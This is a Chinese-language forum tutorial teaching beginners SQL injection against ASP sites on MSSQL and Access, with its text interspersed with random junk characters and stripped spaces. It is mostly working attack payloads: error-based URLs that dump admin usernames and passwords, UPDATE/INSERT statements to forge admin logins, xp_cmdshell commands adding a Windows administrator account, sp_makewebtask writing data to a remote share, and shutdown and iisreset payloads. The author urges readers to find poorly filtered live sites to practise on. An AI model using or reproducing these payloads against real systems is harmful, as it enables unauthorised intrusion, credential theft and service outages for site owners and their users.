[安全]菜鸟SQL注入详解

踏浪行歌

菜鸟SQL注入详解 ; d# E: B- j5 ~$ l9 G- k 网上有很多高手GG们写的利用SQL注入如何去黑网站的，偶看了，嘿嘿。 不过可能对于一些初学者而且，有点难。在这里，小林想把这个过时的 东东作一次全面的交待，尽量让没有编程基础的DDMM们很快的拿握这门技术。 利用SQL进行添加，更改，查看记录。

当一台主机台开了80端口，当你手头没有任何黑客工具，那么，偶们有SQL。 ( D* l+ [4 [# J h9 ~4 h O& F他不需要你其他东东，只要一个浏览器就够了。HOHO，偶的文章菜菜，偶写这 ! w' Z7 H9 h5 d7 W篇文章只是为了让一些对SQL很陌生的菜菜们看的，老鸟绕道。。。

1，什么是SQL注入？ ) t9 y, H- z# z$ \

SQL注入，就是利用欺骗的方式，通过网页的查询功能，或查询命令注入。 2 ]5 X! K* Y. ~% G当用户来到网站，会提交一些数据，再到数据库进行查询，确定此用户的身份。 & G0 _6 ?- W! m; h举个简单的例子来说吧，你去一个站点的论坛，那么，你会输入你的用户名和 密码，点“确定”，网站会通过数据库的查询来判断你是不是他们的用户， 你的用户名和密码是否正确。而利用SQL注入，通过构造特殊的语句，来查找我 们所想要得到的信息，如管理员的帐号密码。以下，小林用了http://xxx.xxx.com 来表示一个存在注入漏洞的网页。

8 ?% f0 t8 _. R' U2，助手篇， 先把IE菜单-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉。 否则，不论服务器返回什么错误，我们都只能看到“HTTP500服务器错误”，不能获得更多的提示信息 / a6 R8 G3 |8 A0 {! Q- X/ Q

。

6 K, v; A; l# \+ C3，哪些网页能利用？ & V2 L# c9 E2 y( n+ D我们去找一些要提交数据的网页，如：登陆页面，查找页面，添加页面等 ( }1 _0 X- t' U+ v找到后，如果你注意过网页的源代码，那么，你会发现，他上面一般有一个如下的表单： p6 d/ i2 a- n3 E4 }

<FORMaction=login.aspmethod=post> & |$ X+ ~+ c" c9 y. \" Z# G<input........ , ^: ?, K) @, p% \" W</FORM>

这些网页，后缀如asp,jsp,cgi，php网页。 ) ~$ j; f2 w! L+ x) ]: w如：http://xxx.xxx.com/index.asp?id=10 上面这个例子，就是ASP页后，看到他的ID还的值了吗？是10。一般，我们找的就是这些页面 / c( ^. Q1 P5 L$ @来练手了。（要做个好人噢。（^_^）像小林一样的好人。）

4，怎么测试它是存在注入漏洞的呢？这一步偶称它为“踩点”。 3 j; S+ h( F9 ]* n/ R B ?小林有一个毛病，看什么网页，就要顺手在参数（如上面的10）上加一个小小的引号。 http://xxx.xxx.com/index.asp?id=10 返回错误信息： 9 g6 w: E: t% C- s

MicrosoftOLEDBProviderforSQLServer错误80040e14

字符串之前有未闭合的引号。 9 J' m5 I! b6 v9 e3 w8 _/ e; U

/job/grxx.asp，行141 : \" V4 ^3 g5 U( E- Q& O2 O

这就是说，他用的是MsSQL数据库。这个引号，导致引号未闭合的错误。本身就是错的，因为 4 G H; G. P6 |& e) S# t7 d7 L ]通常一个整数是不用在SQL里加引号的。

如果他不是一个整数而是字母呢？ 2 Z, Z0 i; M& Q2 \' A

http://xxx.xxx.com/index.asp?user=lamb : u$ H( _" h$ Z* J1 k

那我们就把引号放到lamb中间，如lamb . ~& P$ D$ D" W呵呵，又出错了吧？

这说明，站点这一部分的代码是大有问题的（当然，就算他有源码公布在网上，我也懒得看）

当然，我们也可以提交： 7 U5 t! F U& H1 Phttp://xxx.xxx.com/index.asp?id=10;ANDcolumnaaa=5(注，这里的columnaaa是我乱写的) 出现错误信息： 0 d* p, S' h/ `# _+ B5 R

MicrosoftOLEDBProviderforODBCDrivers错误80040e14

[Microsoft][ODBCSQLServerDriver][SQLServer]Invalidcolumnnamecolumnaaa.

/job/grxx.asp，行27 这说明，这是一个SQL，里面没有columnaaa这个字段（我习惯说“列”）。 , m: w! c' H0 s" Q# ?/ \

利用出错的信息，我们现在多少了解了这个站点的服务了吧？ . I `( w6 o2 O$ m' a

5，现在开工啦，偶不喜欢猜测他的字段名，太浪费TIME了，我们要想办法让数据查询中出错。 要产生一个错误让它自己报出数据库里的值。让我们用一用SQL语法GROUPBY或HAVING。如： # s5 ], w# z' R; b7 g( w' \

http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1--

出现错误信息： " s& D! S+ J3 x0 u2 n; z& cMicrosoftOLEDBProviderforODBCDrivers错误80040e14 $ k, }6 ]% e8 o- L5 Q) }

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.newsidisinvalidinthe 4 q z2 w& _! F7 [! ]; Q2 O* h

selectlistbecauseitisnotcontainedinanaggregatefunctionandthereisnoGROUPBY

clause.

/more.asp，行27 & d* G- g$ y+ N% `3 Z" y; ?: d* H

看到article.newsid了吗？说明有一个叫article.newsid的列，因为你在用HAVING，所以你必须还要用 5 u# R8 Q* M/ w( V; p' G% d6 _, A

上GROUPBY，于是黑客就重复错误提交，直到没有得到错误。 这里要说明一下：分号在这里分离，%20是空格，--表示后面是一个注释，也就是说只是说明，不能去

执行代码。(*_*) $ y4 F v% [# K5 `" X }# T

下面是具体例子：

提交： http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1-- $ ]# X3 f$ _7 o; x* _4 ^; F' F1 G得到article.newsid这真是好东西。 提交： ! S! l7 N* h& ~+ W$ }http://xxx.xxx.com/job/grxx.asp?id=23%20group%20by%20article.newsid%20having%201=1-- 得到错误信息： x2 W$ Q( E. N8 w* \MicrosoftOLEDBProviderforODBCDrivers(0x80040E14) 8 R) E: l, t, A& Q: X3 k8 b+ t

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.titleisinvalidinthe

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY

clause. & u; G- U3 e( w1 z. P

/more.asp，line20

得到： article.title 我们反复地一个一个加上来提交。 得到错误信息： MicrosoftOLEDBProviderforODBCDrivers(0x80040E14) - v0 z0 F3 \- Y; R

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnadm.userNameisinvalidinthe

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY 2 M, H. O4 g t2 K8 f$ x" y

clause.

/more.asp，line56 - D( {1 y1 U3 K0 ?6 j

这里要注意了，都到哪儿了？到下一个表了。 现在我们知道这里至少有2个表，他们的别名是：adm和article，如里面article对应的是：newsid等

title 9 K9 e' ^4 G& u% |; W" l, T

利用系统表：

下面，我们要确定表名来加入数据。 系统表是MS-SQL2000的一部分，名叫sysObjectstable，我们将要用到查询UNIONSELECT,。 ; g; k |4 A* |3 |% s8 ^0 E要从SysObjectstable有天地拿到表名，一般使用下面语句： , p3 X( V: k2 Y& _' QSELECTnameFROMsysObjectsWHERExtype=UU是指明定议USER的表。 ; I$ P4 a' B' T. w ]6 W0 v L" M黑客们已经知道了表里的列， 现在他们能在下面加一些数字。甚至如下面的：

在地址栏里打入： 7 N% C* d; H7 l1 F; ]

http://xxx.xxx.com/job/grxx.asp?id=23%20UNION%20ALL%20SELECT%; 201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype=U-- ' A2 m2 }' }+ t6 z1 N% H记住，上面的，1-6数据中，6是我们想要的。不过有时候会出现数据类型错误， 7 Q7 a% D/ Y8 M, I: L/ Q$ n; h

http://xxx.xxx.com/job/grxx.asp?id=23%20SELECT;TOP1TABLE_NAMEFROM

INFORMATION_SCHEMA.TABLES-- ' A7 G6 h( u& l( Z! g3 M4 J

MSSQL服务将试图去转换一个string(nvarchar)到integer。那么就会出错：

MicrosoftOLEDBProviderforODBCDriverserror80040e07 1 g( \5 k+ Q v1 W( L8 d- V4 V[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

table1toacolumnofdatatypeint. + y! B; G# Z2 r, u6 x3 \/index.asp,line5

这个错误信息很“友好”地告诉我们string(nvarchar)值不能被转换成integer。 2 O. c; G8 G* D: c3 P+ a这样，我们就获得了数据表的第一个表名！这个表名就是tabel1。

. V* W$ d4 h4 Q) e5 S6 c9 R" y要获得第二个表名，我们继续，用以下查询： http://xxx.xxx.com/job/grxx.asp?id=23%20UNION;SELECTTOP1TABLE_NAMEFROM - `% x. j! q' r! i/ n

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMENOTIN(table1)--

也可以用关键字查找数据： ; w: R! |' V# R3 `& ]& C) F/ [http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1TABLE_NAMEFROM ( G$ f* l% j7 s+ i4 h% }7 O3 I

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMELIKE%25ADMIN%25-- * t+ r6 M! y9 Z' u- ?8 ?现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 ( \1 @8 G% ~- G6 U7 l4 C[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

admin_logintoacolumnofdatatypeint. 4 F9 f" n/ u! E+ I: D/index.asp,line5 8 ~# P3 z, @. q6 B% s6 E* ~

寻找与之匹配的值，%25ADMIN%25在SQL服务器上将被认作%ADMIN%。这样，我们就能获得符合标 7 V$ t3 G( x, U准的表名为"admin_login"的表了。

那么，如何获得表里所有的列表？ 5 a6 s0 ]8 ]6 g( y- i# ^

我们能利用另一个有用的东东，INFORMATION_SCHEMA.COLUMNS出场！！！ & t- O1 B( n3 L, l+ D- R1 Phttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM / w% E) g5 E; J6 l d, ^

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_login--

现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue . Q2 Y5 P) w/ M% I1 N( T0 e

u_idtoacolumnofdatatypeint. / U! Z4 O9 n) W, K. e/index.asp,line6 看，我们有了第一个字段的名，我们用NOTIN()来获得下一个字段名： 3 B2 E6 F6 s: [; v) `3 }2 e- Ghttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN & e+ A/ z' q) B$ F

(u_id)-- 现在错误信息： * y M; {# Q6 a9 R# x: e; ^MicrosoftOLEDBProviderforODBCDriverserror80040e07 ! c$ i: g, D! W; A1 \[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

u_nametoacolumnofdatatypeint. /index.asp,line5 2 I$ z, U9 a) x! _1 N我们继续，获得其他列表。如："password"等，因为我们获得下面错误信息： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM 5 |+ P5 }9 L, ?: b( U: D

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN

(u_id,u_name,password,contents)-- 6 H4 p0 G1 T# x/ e3 w% p现在错误信息： 7 O" d. @2 ?- J$ i6 o' XMicrosoftOLEDBProviderforODBCDriverserror80040e14 - o S+ g" L0 W8 U% t- z[Microsoft][ODBCSQLServerDriver][SQLServer]ORDERBYitemsmustappearintheselect 3 n3 K/ `( o: J3 T0 Z

listifthestatementcontainsaUNIONoperator. /index.asp,line5 6。2如何找到我们要找的重要数据呢？ 9 ~) W; e1 X7 W8 c) {现在我们知道了表名，字段名，我们用相同的方法收集我们要的在数据库里的信息。 现在，我们从"admin_login"表里取得第一个u_name： 4 Y' s$ k1 B6 H$ G2 Yhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1u_nameFROMadmin_login-- 2 ~7 E* P* x4 Y; T6 s5 L现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue $ Z- i6 Y7 w, @

adminroottoacolumnofdatatypeint. /index.asp,line5

我们知道，这里有登陆的用户名叫"adminroot"的管理员。最后，从数据库里获得"adminroot"的密码

： * O% ~9 p, X7 {0 C9 k7 [4 `' R4 O* Xhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere 9 L2 Y9 [$ f. A. e9 D! J- H# @ ^

u_name=adminroot-- . p# h! u; L* g7 V现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 " ~" j; j) c0 ?[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

roottoacolumnofdatatypeint. /index.asp,line5 我们现在能用户名"adminroot"密码："root"登陆了。

& O; O: e9 I7 X" t如何取得数字的值？ , p: P+ C( o: x' @: n% O, B9 {

以上技术描述有有一定的局限性。当我们试图转换文本组成有效的数字0-9我们不能得到任何错误。 % C ]6 Z" d" h2 a$ M让我们说说如何获得"tony"的密码，密码是"19840217": http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere 9 D; }; U8 H; h9 \: Z- |

u_name=tony-- ) d1 |" h( s2 D我们很可能发现，该页无法显示的错误。这结果表示，密码"19840217"被修改到一个数了。在整 合一个整型(10也是)，因为这是一个有效的整合。所以SQL服务就不会给出错误的提示了。 8 _3 [4 ?+ E# M" b: ?: j, B7 f5 V我们就得不到数字的登陆了。 / I/ ~2 [4 \4 e要解决这个问题，我们能附加一些字母来测试转换失败。我们用以下的测试来代替： 0 u! q! O3 K/ a$ W6 zhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1convert(int,

password%2b%20lambgirl)FROMadmin_loginwhereu_name=tony-- ) G/ s) J8 J/ w

我们简单地利用加号+设置密码数据文件的搜索路径。随便加一些。ASSCII码+=0x2b 7 m; m$ l: N b; P" G# @6 c$ o我们将添加空格在密码里。所以，如果把我们的密码是19840217。他将变成19840217lambgirl. & }& y; a- k( o调出了转换了的函数。试着将19840217lambgirl转变成整型。SQL服务将出现ODBC错误： 7 ?) a2 x* \+ I6 X$ v: k6 sMicrosoftOLEDBProviderforODBCDriverserror80040e07 4 L: v. S: z9 U8 f& Y. H% v2 z[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue 5 X" A% ]; a/ H

19840217lambgirltoacolumnofdatatypeint. % Y' Z$ e, j# X# H+ s: w8 h/index.asp,line5 现在，你就能用tony和密码：19840217lambgirl了。 % K$ x: {9 g' b" q6 @$ n8 J$ |( ]8 q

2 w9 R1 ]$ H' v如何在数据库修改，插入数据？ 当我们成功地获得了表名，字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot" 的密码，我们

http://xxx.xxx.com/job/grxx.asp?id=23;UPDATEadmin_loginSETpassword=newpas5WHERE 0 J8 r* |% }+ D

u_name=adminroot--

要在数据表里插入新记录，

http://xxx.xxx.com/job/grxx.asp?id=23;INSERTINTOadmin_login(u_id,u_name,

password,contents)VALUES(123,xiaolin,pas,lambgirl)-- 现在，我们就能用xiaolinpas来登陆了。 ( o8 d( `: e# C+ F8 g% @" p

( I5 w/ U( {' {2 t, ]% D s如何远程执行SQL漏洞？

能进行SQL注入命令表明，我们能查任何我们想要查的。默认安装的的MSSQL服务 在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell来执行远程破坏： ;execmaster..xp_cmdshellping192.168.0.2-- 8 H3 O, }) {1 U, }! j( o0 l/ f

(如果单引号不能用，就换成双引号)

分号表示结束前面的SQL查询，从而允许你开始另一个新的SQL命令。 & {1 f3 q- v& T; ~$ y为了检验命令成功执行，你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。 : l; _* F) [: E

#tcpdumpicmp + F7 K: o I7 l' T% D4 A如果你没有接到PING主机的回应，得到一个错误的提示，权限错误，那么，很可能管理员 . X" C, b6 ?) @7 E' e9 d3 _! }5 J限制了WEB用户对xp_cmdshell等的权限。

如何找出MYSQL查询结果？ 这很容易用sp_makewebtask来把你查询的结果放到一个HTML里： * T4 J0 S: G! d' _;EXECmaster..sp_makewebtask"\\192.168.0.2\share\girlxiaolin.html","SELECT*FROM : K1 J7 C; A5 ]; u1 _0 ?

INFORMATION_SCHEMA.TABLES" ! O N) U$ s( a. k. }5 v+ [但是目标IP必须共享文件夹。 4 U* s ^5 ^! Y& J' T

http://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netusername password/add”--

xp_cmdshell用于调用系统命令，于是，用net命令新建了用户名为name、密码为password % K$ ~! }/ x7 h0 r- n; x9 r: x的windows的帐号，接着： / g9 F+ g( y% z* g6 e, b2 ahttp://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netlocalgroupname

administrators/add”-- & w% l" Q" r) s" L! i% c2 C将新建的帐号name加入管理员组，不过这种方法只于用sa连接数据库的情况，否则，没有权限调用

xp_cmdshell。

其他方面，如利用SQL的命令填写： 将使SQL服务快速关闭 ) G) n& q# u% k% Y3 _7 s' h; S: M) Q9 e用户名:;shutdownwithnowait;-- 7 B* u* }3 M3 m$ ]3 R- t密码:不填 $ V% Q, r$ r2 ?0 ?/ [0 m

导致严重问题，网络故障。 用户名:;execmaster..xp_cmdshelliisreset;-- 1 m: Y" k8 R; d2 F: K7 `/ J9 a密码：不填 . I/ k( h% |7 L/ I& R2 x- R! i3 V9 h

关于ACCESS部分， 0 A2 q. }9 f) g4 ]) w

和ASSQL差不了多少，也是先在http://xxx.xxx.com/index.asp?id=10 0 ^+ B# c1 G* S, b$ m: K

出错的话，继续提交： 先测试是否有ADMIN表， http://xxx.xxx.com/index.asp?id=10and0<>(selectcount(*)fromadmin)

http://xxx.xxx.com/index.asp?id=10and1=(selectcount(*)fromadmin) 没有的话，就换一个名字，如user啊，什么的。再猜里面是否有username这个字段.

and1=(selectcount(*)fromadminwherelen(username)>0) 如果出错，同理，我们也可以给它换一个名字。 接下来我们猜用户的具体名字。 ; C! f4 B/ M$ \2 \* m0 S) b, L3 Fand1=(selectcount(*)fromadminwhereleft(username,1)=l) 这时我们可以一个一个地来猜。 and1=(selectcount(*)fromadminwhereleft(username,2)=la) 接下来猜密码，猜密码的道理同猜用户名一样。 - ~. O/ _* u/ {and1=(selectcount(*)fromadminwhereleft(password,1)=l) ; L( p( G5 e7 P: l/ V

好了，不写了，这篇文章小林写了好几天了，累死了，还是条理不清楚。 文章还有很多不全面的地方。还有一些专业术语，小林可能也有误，不过小菜们拿来看看还 & F, V. l, p( s- t0 t/ i是行的啦。如果哪些写错了，请老鸟们加偶：165442496，告诉我错误，我会修正的。 我试过了，很多用MsSQL站点过滤不完整的网上也很多。所以大家可以找来练练手。 5 V4 I/ k4 u; {3 _9 R8 S % k# H3 a9 k+ k& ^" R6 g- T$ E

[em09]